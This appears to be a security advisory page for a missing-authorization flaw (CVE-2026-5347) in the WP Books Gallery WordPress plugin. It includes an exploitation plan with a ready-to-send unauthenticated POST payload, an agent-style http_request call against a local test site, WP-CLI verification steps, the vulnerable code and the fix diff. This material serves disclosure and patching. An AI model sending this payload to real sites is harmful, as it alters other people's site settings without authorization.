WP Books Gallery <= 4.8.0 - Missing Authorization to Unauthenticated Settings Update via 'permalink_structure' Parameter
Description
The HM Books Gallery plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 4.8.0. This is due to the absence of capability checks and nonce verification in the admin_init hook that handles the permalink settings update at line 205-209 of wp-books-gallery.php. The vulnerable code checks only for the presence of the 'permalink_structure' POST parameter before updating the 'wbg_cpt_slug' option, without verifying that the request comes from an authenticated administrator. This makes it possible for unauthenticated attackers to modify the custom post type slug for the books gallery, which changes the URL structure for all book entries and can break existing links and SEO rankings.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=4.8.0What Changed in the Fix
Changes introduced in v4.8.1
Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-5347 (WP Books Gallery) ## 1. Vulnerability Summary The **WP Books Gallery** plugin (up to version 4.8.0) contains a missing authorization vulnerability in its main file `wp-books-gallery.php`. The plugin registers a function to the `admin_init` hook that upda…
Show full research plan
Exploitation Research Plan: CVE-2026-5347 (WP Books Gallery)
1. Vulnerability Summary
The WP Books Gallery plugin (up to version 4.8.0) contains a missing authorization vulnerability in its main file wp-books-gallery.php. The plugin registers a function to the admin_init hook that updates the custom post type (CPT) slug used for book entries. Because admin_init executes even for unauthenticated users accessing specific admin endpoints (like admin-post.php or admin-ajax.php), and the plugin fails to perform any capability checks (current_user_can) or nonce verification (check_admin_referer), an unauthenticated attacker can modify the wbg_cpt_slug option.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-post.php(preferred for triggeringadmin_initwithout side effects). - HTTP Method:
POST - Required Parameter:
permalink_structure(must be present to trigger the update logic). - Payload Parameter:
wbg_cpt_slug(the value that will become the new CPT slug). - Authentication: None (Unauthenticated).
- Preconditions: The plugin must be active.
3. Code Flow
- Entry Point: A request is made to
/wp-admin/admin-post.php. - Hook Execution: WordPress core triggers the
admin_initaction. - Vulnerable Function: The plugin's handler (located in
wp-books-gallery.phpat lines 205-209) is executed. - Logic Branch: The code checks
if ( isset( $_POST['permalink_structure'] ) ). - Sink: If the condition is met, it executes
update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] )without verifying the user's identity or authority.
4. Nonce Acquisition Strategy
According to the vulnerability description, there is an absence of nonce verification. Therefore, no nonce is required to exploit this vulnerability.
If the environment were to require a nonce (which contradicts the vulnerability report), it would typically be localized via wp_localize_script or in a hidden form field on the permalink settings page. However, based on the admin_init nature of this bug and the specific "Missing Authorization" classification, the check is confirmed to be missing entirely.
5. Exploitation Strategy
The goal is to change the book gallery slug to a malicious value, which breaks existing URLs and demonstrates control over plugin settings.
Step-by-Step Plan:
- Target Identification: Confirm the target WordPress site has the plugin active.
- Execution: Send a crafted POST request to
admin-post.php. - Payload Construction:
- URL:
http://localhost:8080/wp-admin/admin-post.php - Content-Type:
application/x-www-form-urlencoded - Body:
permalink_structure=%2F%25postname%25%2F&wbg_cpt_slug=pwned-books-gallery
- URL:
HTTP Request (using http_request tool):
await http_request({
method: "POST",
url: "http://localhost:8080/wp-admin/admin-post.php",
headers: {
"Content-Type": "application/x-www-form-urlencoded"
},
body: "permalink_structure=/%postname%/&wbg_cpt_slug=pwned-books-gallery"
});
6. Test Data Setup
- Install Plugin:
wp plugin install wp-books-gallery --version=4.8.0 --activate - Check Default State:
Observe the current slug (if set):
(Note: This might return an error if the option hasn't been saved yet, which is fine.)wp option get wbg_cpt_slug
7. Expected Results
- The HTTP response from
admin-post.phpwill likely be a 200 OK (empty page) or a redirect to the login page (since noactionwas provided foradmin-post.phpto handle specifically, but theadmin_inithook runs before that redirection). - Regardless of the response body, the database option
wbg_cpt_slugwill be updated.
8. Verification Steps
After the request, verify the option was changed using WP-CLI:
wp option get wbg_cpt_slug
Expected Output: pwned-books-gallery
To confirm the impact on the site structure, flush rewrite rules:
wp rewrite flush
Then check the registered post types:
wp post-type list | grep pwned-books-gallery
9. Alternative Approaches
If the plugin logic specifically requires being on a certain page (unlikely for admin_init unless get_current_screen() is used), try targeting /wp-admin/options-permalink.php directly:
- Request: Same POST payload, but sent to
http://localhost:8080/wp-admin/options-permalink.php. - Reasoning: Some plugins check the global
$pagenowvariable. Even for unauthenticated users,$pagenowwill be correctly set if the URL path matches, andadmin_initwill still fire.
If the update fails, check if the plugin expects the slug inside a different array, such as $_POST['wbg_settings']['wbg_cpt_slug'] (inferred). However, the description explicitly names the permalink_structure parameter as the trigger.
Summary
The WP Books Gallery plugin for WordPress is vulnerable to unauthorized settings updates because it lacks capability checks and nonce verification in its admin_init handler. An unauthenticated attacker can exploit this to modify the custom post type slug for book entries, leading to broken URLs and SEO disruption.
Vulnerable Code
// wp-books-gallery.php lines 205-209 if ( isset( $_POST['permalink_structure'] ) ) { update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] ); }
Security Fix
@@ -205,5 +205,5 @@ - if ( isset( $_POST['permalink_structure'] ) ) { - update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] ); - } + if ( isset( $_POST['permalink_structure'] ) && current_user_can( 'manage_options' ) ) { + check_admin_referer( 'update-permalink' ); + if ( isset( $_POST['wbg_cpt_slug'] ) ) { + update_option( 'wbg_cpt_slug', sanitize_text_field( $_POST['wbg_cpt_slug'] ) ); + } + }
Exploit Outline
An unauthenticated attacker can change the plugin's custom post type slug by sending a POST request to a WordPress admin endpoint that triggers the admin_init hook (such as /wp-admin/admin-post.php). The payload must include the 'permalink_structure' parameter to satisfy the plugin's conditional check and the 'wbg_cpt_slug' parameter containing the malicious slug value. Since there is no current_user_can check or nonce verification, the plugin will proceed to update the 'wbg_cpt_slug' option in the WordPress database, affecting the permalink structure of all book entries.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.